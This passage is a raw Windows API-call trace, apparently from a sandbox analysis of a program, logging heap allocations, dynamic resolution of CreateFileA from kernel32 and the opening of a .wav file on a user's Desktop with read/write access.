(HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab50 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0075.655] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.655] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.656] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.656] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0075.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.657] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.657] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0075.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0075.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.658] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.658] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.658] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.659] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.659] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.660] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.661] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.661] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.661] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.661] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.661] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76e3c0 [0075.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76e3c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0075.661] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.661] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0075.661] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.661] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e3c0 [0075.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76e3c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0075.661] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.662] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10001) returned 0x771fe8 [0075.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0075.662] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x3c) returned 0x74b420 [0075.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav", cchWideChar=60, lpMultiByteStr=0x74b420, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav", lpUsedDefaultChar=0x0) returned 60 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.662] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.662] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1sxwh1rq8k oa-gv-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=60, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x78) returned 0x660098 [0075.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=60, lpWideCharStr=0x660098, cchWideChar=60 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav") returned 60 [0075.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0075.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x660098 | out: hHeap=0x650000) returned 1 [0075.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.663] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, 